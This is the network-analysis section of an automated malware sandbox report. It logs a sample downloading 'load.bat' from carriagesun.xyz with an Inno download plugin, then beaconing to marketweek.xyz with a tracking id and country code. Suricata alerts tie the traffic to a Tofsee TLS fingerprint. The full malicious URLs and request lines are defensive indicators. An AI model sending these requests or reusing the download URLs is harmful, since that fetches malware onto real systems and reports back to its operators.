Network Analysis
Name | Response | Post-Analysis Lookup |
---|---|---|
carriagesun.xyz | 172.67.188.99 | |
marketweek.xyz | 172.67.211.92 | |
HEAD 200 https://carriagesun.xyz/pe/start/index.php?a=2910&p=4134&t=50784292
Request:
HEAD /pe/start/index.php?a=2910&p=4134&t=50784292 HTTP/1.1
Accept: */*
User-Agent: InnoDownloadPlugin/1.5
Host: carriagesun.xyz
Content-Length: 0
Connection: Keep-Alive
Cache-Control: no-cache
Response:
HTTP/1.1 200 OK
Date: Fri, 04 Oct 2024 02:23:44 GMT
Content-Type: application/octet-stream
Content-Length: 0
Connection: keep-alive
X-Powered-By: PHP/7.2.7
Content-Description: File Transfer
Content-Disposition: attachment; filename="load.bat"
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hbeLwOIVNvk9v6ZMSD%2BbBaraPmLaFIobXJVcxW1L0y9mUCU2AWWtpMfbWSMQXDwGgRTA06FK2DBviIHbGkGapz1Qq4cjF%2B6qJ114MGwFdPrl5isWeGcCPZv7i3m6EmqF4aM%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8cd1b62aa8457d10-LAX
alt-svc: h3=":443"; ma=86400
GET 200 https://carriagesun.xyz/pe/start/index.php?a=2910&p=4134&t=50784292
Request:
GET /pe/start/index.php?a=2910&p=4134&t=50784292 HTTP/1.1
Accept: */*
User-Agent: InnoDownloadPlugin/1.5
Host: carriagesun.xyz
Connection: Keep-Alive
Cache-Control: no-cache
Response:
HTTP/1.1 200 OK
Date: Fri, 04 Oct 2024 02:23:44 GMT
Content-Type: application/octet-stream
Content-Length: 13685
Connection: keep-alive
X-Powered-By: PHP/7.2.7
Content-Description: File Transfer
Content-Disposition: attachment; filename="load.bat"
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FE%2B1eqjLH6pZ5mM8mjHJPp6L3JqB8yrsf9e2LTKoiNOTdBvtSnIEjCvP2WbCMSkWlC0yTVX1EHrBox2GuppqrMG%2ByJqL4WRbJQ4x02PNDeFARFh2OVwtXZ5RV2NLtHIQE1o%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8cd1b62d0ad97d10-LAX
GET 200 https://marketweek.xyz/endroipe?tid=50784292&pid=4134&a=2910&cc=KR&t=1728008627
Request:
GET /endroipe?tid=50784292&pid=4134&a=2910&cc=KR&t=1728008627 HTTP/1.1
Host: marketweek.xyz
Connection: Keep-Alive
Response:
HTTP/1.1 200 OK
Date: Fri, 04 Oct 2024 02:24:08 GMT
Content-Type: text/plain
Content-Length: 2
Connection: keep-alive
X-Powered-By: PHP/5.5.38
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FZY2fyzOU4waWLIMiZETmLtt4XJ2ckUhehM2G4SXi29Wk1Azpr%2BvquWZ%2BQ1RT9stgZj%2BCpn%2BTglpMuWsE8mLgdrk00Zlek7YcSZ6navmrQs8%2FBq2QA7lH6WX7eD43m%2BDhg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8cd1b6c55aee2b85-LAX
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
Flow | SID | Signature | Category |
---|---|---|---|
TCP 192.168.56.103:49176 -> 172.67.211.92:443 | 906200054 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined |
TCP 192.168.56.103:49164 -> 172.67.188.99:443 | 906200054 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined |
Suricata TLS
Flow | Issuer | Subject | Fingerprint |
---|---|---|---|
TLSv1 192.168.56.103:49176 -> 172.67.211.92:443 | C=US, O=Google Trust Services, CN=WE1 | CN=marketweek.xyz | 30:7f:b7:8c:f9:69:12:0f:96:f2:5e:4e:bd:40:11:2d:ee:25:0c:c5 |
TLSv1 192.168.56.103:49164 -> 172.67.188.99:443 | C=US, O=Google Trust Services, CN=WE1 | CN=carriagesun.xyz | 0c:53:11:1c:34:df:ab:25:76:d8:db:8d:49:a0:c3:d9:61:87:88:c6 |
Snort Alerts
No Snort Alerts